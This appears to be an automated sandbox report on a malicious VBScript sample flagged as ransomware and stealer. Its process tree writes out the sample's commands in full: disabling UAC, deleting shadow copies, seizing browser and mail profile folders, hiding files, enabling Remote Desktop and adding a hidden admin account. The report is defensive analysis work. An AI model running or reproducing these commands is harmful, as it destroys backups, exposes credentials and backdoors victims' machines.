57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b

Analysis

max time kernel
25s
max time network
50s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
19-10-2022 15:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Size

181KB
MD5

91f6b90fc19be94b62bb3ec2ff60fc30
SHA1

ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA256

57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512

ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
SSDEEP

1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F

Score

10^/10

discovery evasion exploit persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	WScript.exe

UAC bypass 3 TTPs 4 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WScript.exeSystemProtection.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\""	WScript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	SystemProtection.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\""	SystemProtection.exe

Disables RegEdit via registry modification 4 IoCs

evasion

Processes:

WScript.exeWScript.exeWScript.exeSystemProtection.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	SystemProtection.exe

Disables Task Manager via registry modification
evasion
Executes dropped EXE 1 IoCs

Processes:

SystemProtection.exe

pid process

1936 SystemProtection.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1504 netsh.exe

pid	process
1936	SystemProtection.exe

pid	process
1504	netsh.exe

Possible privilege escalation attempt 26 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exe

pid	process
1576	takeown.exe
1752	takeown.exe
1572	takeown.exe
520	takeown.exe
1032	takeown.exe
756	takeown.exe
1100	takeown.exe
784	takeown.exe
1488	icacls.exe
1508	takeown.exe
1984	takeown.exe
1496	takeown.exe
1956	takeown.exe
1520	takeown.exe
1156	icacls.exe
1584	takeown.exe
1632	takeown.exe
2024	takeown.exe
516	takeown.exe
1988	takeown.exe
1564	takeown.exe
1488	icacls.exe
1144	takeown.exe
1204	takeown.exe
2012	takeown.exe
1096	icacls.exe

Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1760 attrib.exe
1144 attrib.exe
1920 attrib.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1452 cmd.exe

pid	process
1760	attrib.exe
1144	attrib.exe
1920	attrib.exe

pid	process
1452	cmd.exe

Drops startup file 4 IoCs

Processes:

WScript.exeSystemProtection.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe	SystemProtection.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe	SystemProtection.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe	WScript.exe

Loads dropped DLL 2 IoCs

Processes:

WScript.exe

pid process

1064 WScript.exe
1064 WScript.exe

pid	process
1064	WScript.exe
1064	WScript.exe

Modifies file permissions 1 TTPs 26 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exe

pid	process
1096	icacls.exe
756	takeown.exe
1488	icacls.exe
1520	takeown.exe
1156	icacls.exe
1508	takeown.exe
1584	takeown.exe
1100	takeown.exe
1572	takeown.exe
1576	takeown.exe
1144	takeown.exe
1632	takeown.exe
1496	takeown.exe
1752	takeown.exe
784	takeown.exe
1032	takeown.exe
1984	takeown.exe
516	takeown.exe
2012	takeown.exe
1988	takeown.exe
1564	takeown.exe
2024	takeown.exe
520	takeown.exe
1488	icacls.exe
1204	takeown.exe
1956	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

WScript.exeSystemProtection.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WScript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SystemProtection.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

2028 vssadmin.exe
2004 vssadmin.exe

pid	process
2028	vssadmin.exe
2004	vssadmin.exe

Modifies registry class 2 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon\ = "C:\\Windows\\system32\\shell32.dll,1"	reg.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1588 reg.exe
1584 reg.exe
1632 reg.exe
932 reg.exe
976 reg.exe
300 reg.exe
Runs net.exe

pid	process
1588	reg.exe
1584	reg.exe
1632	reg.exe
932	reg.exe
976	reg.exe
300	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

vssvc.exetakeown.exe

description	pid	process
Token: SeBackupPrivilege	1436	vssvc.exe
Token: SeRestorePrivilege	1436	vssvc.exe
Token: SeAuditPrivilege	1436	vssvc.exe
Token: SeTakeOwnershipPrivilege	2024	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1064 wrote to memory of 648	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 648	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 648	1064	WScript.exe	cmd.exe
PID 648 wrote to memory of 1648	648	cmd.exe	mode.com
PID 648 wrote to memory of 1648	648	cmd.exe	mode.com
PID 648 wrote to memory of 1648	648	cmd.exe	mode.com
PID 648 wrote to memory of 1376	648	cmd.exe	cmd.exe
PID 648 wrote to memory of 1376	648	cmd.exe	cmd.exe
PID 648 wrote to memory of 1376	648	cmd.exe	cmd.exe
PID 648 wrote to memory of 1492	648	cmd.exe	find.exe
PID 648 wrote to memory of 1492	648	cmd.exe	find.exe
PID 648 wrote to memory of 1492	648	cmd.exe	find.exe
PID 648 wrote to memory of 592	648	cmd.exe	WScript.exe
PID 648 wrote to memory of 592	648	cmd.exe	WScript.exe
PID 648 wrote to memory of 592	648	cmd.exe	WScript.exe
PID 592 wrote to memory of 1144	592	WScript.exe	cmd.exe
PID 592 wrote to memory of 1144	592	WScript.exe	cmd.exe
PID 592 wrote to memory of 1144	592	WScript.exe	cmd.exe
PID 1144 wrote to memory of 1072	1144	cmd.exe	WScript.exe
PID 1144 wrote to memory of 1072	1144	cmd.exe	WScript.exe
PID 1144 wrote to memory of 1072	1144	cmd.exe	WScript.exe
PID 1144 wrote to memory of 1588	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1588	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1588	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1584	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1584	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1584	1144	cmd.exe	reg.exe
PID 648 wrote to memory of 1632	648	cmd.exe	reg.exe
PID 648 wrote to memory of 1632	648	cmd.exe	reg.exe
PID 648 wrote to memory of 1632	648	cmd.exe	reg.exe
PID 648 wrote to memory of 756	648	cmd.exe	find.exe
PID 648 wrote to memory of 756	648	cmd.exe	find.exe
PID 648 wrote to memory of 756	648	cmd.exe	find.exe
PID 648 wrote to memory of 2028	648	cmd.exe	vssadmin.exe
PID 648 wrote to memory of 2028	648	cmd.exe	vssadmin.exe
PID 648 wrote to memory of 2028	648	cmd.exe	vssadmin.exe
PID 1064 wrote to memory of 1520	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 1520	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 1520	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 1452	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 1452	1064	WScript.exe	cmd.exe
PID 1064 wrote to memory of 1452	1064	WScript.exe	cmd.exe
PID 1520 wrote to memory of 2012	1520	cmd.exe	takeown.exe
PID 1520 wrote to memory of 2012	1520	cmd.exe	takeown.exe
PID 1520 wrote to memory of 2012	1520	cmd.exe	takeown.exe
PID 1452 wrote to memory of 1700	1452	cmd.exe	cmd.exe
PID 1452 wrote to memory of 1700	1452	cmd.exe	cmd.exe
PID 1452 wrote to memory of 1700	1452	cmd.exe	cmd.exe
PID 1452 wrote to memory of 1748	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1748	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1748	1452	cmd.exe	reg.exe
PID 1520 wrote to memory of 1988	1520	cmd.exe	takeown.exe
PID 1520 wrote to memory of 1988	1520	cmd.exe	takeown.exe
PID 1520 wrote to memory of 1988	1520	cmd.exe	takeown.exe
PID 1452 wrote to memory of 1184	1452	cmd.exe	xcopy.exe
PID 1452 wrote to memory of 1184	1452	cmd.exe	xcopy.exe
PID 1452 wrote to memory of 1184	1452	cmd.exe	xcopy.exe
PID 1520 wrote to memory of 1676	1520	cmd.exe	cacls.exe
PID 1520 wrote to memory of 1676	1520	cmd.exe	cacls.exe
PID 1520 wrote to memory of 1676	1520	cmd.exe	cacls.exe
PID 1452 wrote to memory of 1160	1452	cmd.exe	xcopy.exe
PID 1452 wrote to memory of 1160	1452	cmd.exe	xcopy.exe
PID 1452 wrote to memory of 1160	1452	cmd.exe	xcopy.exe
PID 1520 wrote to memory of 1464	1520	cmd.exe	cacls.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate = "33"	WScript.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1588 attrib.exe
1144 attrib.exe
1920 attrib.exe
1760 attrib.exe

pid	process
1588	attrib.exe
1144	attrib.exe
1920	attrib.exe
1760	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
1⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1064

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\system32\mode.com
mode con lines=1 cols=14
3⤵
PID:1648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
3⤵
PID:1376

C:\Windows\system32\find.exe
find /i "version 6.1."
3⤵
PID:1492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"
4⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"
5⤵
- Disables RegEdit via registry modification
PID:1072

C:\Windows\system32\reg.exe
reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f
5⤵
- UAC bypass
- Modifies registry key
PID:1588

C:\Windows\system32\reg.exe
reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f
5⤵
- UAC bypass
- Modifies registry key
PID:1584

C:\Windows\system32\reg.exe
reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua
3⤵
- Modifies registry key
PID:1632

C:\Windows\system32\find.exe
find /i "0x0"
3⤵
PID:756

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\system32\takeown.exe
takeown /F C:\kernel /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2012

C:\Windows\system32\takeown.exe
takeown /F C:\system32 /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1988

C:\Windows\system32\cacls.exe
CACLS C:\Kernel /E /T /C /G Admin:F
3⤵
PID:1676

C:\Windows\system32\cacls.exe
CACLS C:\system32 /E /T /C /G Admin:F
3⤵
PID:1464

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1752

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1584

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1100

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1564

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1572

C:\Windows\system32\takeown.exe
takeown /F "%userproflie%\cookies" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:784

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\drivers" /A /R /D O
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1576

C:\Windows\system32\takeown.exe
takeown /a /f C:\Windows\System32\wscript.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1096

C:\Windows\system32\takeown.exe
takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:520

C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1488

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
3⤵
PID:1700

C:\Windows\system32\reg.exe
reg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f
3⤵
- Modifies registry class
PID:1748

C:\Windows\system32\xcopy.exe
xcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
3⤵
PID:1184

C:\Windows\system32\xcopy.exe
xcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
3⤵
PID:1160

C:\Windows\system32\xcopy.exe
xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"
3⤵
PID:1048

C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
3⤵
- Views/modifies file attributes
PID:1588

C:\Windows\system32\attrib.exe
attrib +s +h "C:\system32"
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1144

C:\Windows\system32\attrib.exe
attrib +s +h "C:\kernel"
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1920

C:\Windows\system32\xcopy.exe
xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"
3⤵
PID:592

C:\Windows\system32\xcopy.exe
xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"
3⤵
PID:628

C:\Windows\system32\attrib.exe
attrib +s +h "C:\kernel\r00t3r"
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1760

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
2⤵
PID:1240

C:\system32\SystemProtection.exe
"C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat
2⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Drops startup file
- Checks whether UAC is enabled
PID:1936

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
3⤵
PID:1988

C:\Windows\system32\mode.com
mode con lines=1 cols=14
4⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
4⤵
PID:1160

C:\Windows\system32\find.exe
find /i "version 6.1."
4⤵
PID:1924

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"
4⤵
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"
5⤵
PID:1096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"
6⤵
- Disables RegEdit via registry modification
PID:1372

C:\Windows\system32\reg.exe
reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f
6⤵
- UAC bypass
- Modifies registry key
PID:932

C:\Windows\system32\reg.exe
reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f
6⤵
- UAC bypass
- Modifies registry key
PID:976

C:\Windows\system32\reg.exe
reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua
4⤵
- Modifies registry key
PID:300

C:\Windows\system32\find.exe
find /i "0x0"
4⤵
PID:1064

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:2004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
3⤵
PID:2000

C:\Windows\system32\takeown.exe
takeown /F C:\kernel /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1032

C:\Windows\system32\takeown.exe
takeown /F C:\system32 /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1144

C:\Windows\system32\cacls.exe
CACLS C:\Kernel /E /T /C /G Admin:F
4⤵
PID:1572

C:\Windows\system32\cacls.exe
CACLS C:\system32 /E /T /C /G Admin:F
4⤵
PID:784

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1632

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:756

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1204

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:516

C:\Windows\system32\takeown.exe
takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1496

C:\Windows\system32\takeown.exe
takeown /F "%userproflie%\cookies" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1508

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\drivers" /A /R /D O
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1984

C:\Windows\system32\takeown.exe
takeown /a /f C:\Windows\System32\wscript.exe
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1956

C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1488

C:\Windows\system32\takeown.exe
takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1520

C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
3⤵
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
4⤵
PID:1544

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
3⤵
PID:612

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"
3⤵
- Modifies visiblity of hidden/system files in Explorer
PID:944

C:\Windows\system32\cmd.exe
cmd /c ""C:\system32\bkr.bat" "
3⤵
PID:648

C:\Windows\system32\netsh.exe
netsh firewall set service type=remotedesktop mode=enable scope=all
4⤵
- Modifies Windows Firewall
PID:1504

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
4⤵
PID:2004

C:\Windows\system32\net.exe
net user timalin /delete
4⤵
PID:1548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user timalin /delete
5⤵
PID:1144

C:\Windows\system32\net.exe
net user NTUSER /delete
4⤵
PID:828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user NTUSER /delete
5⤵
PID:784

C:\Windows\system32\net.exe
net user /add HelpAssistant jevoussalue
4⤵
PID:1496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add HelpAssistant jevoussalue
5⤵
PID:1984

C:\Windows\system32\net.exe
net localgroup Administrators /add NTUSER
4⤵
PID:1828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators /add NTUSER
5⤵
PID:1552

C:\Windows\system32\net.exe
net localgroup Administrateurs /add NTUSER
4⤵
PID:1052

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f
4⤵
PID:208

C:\Windows\System32\cmd.exe
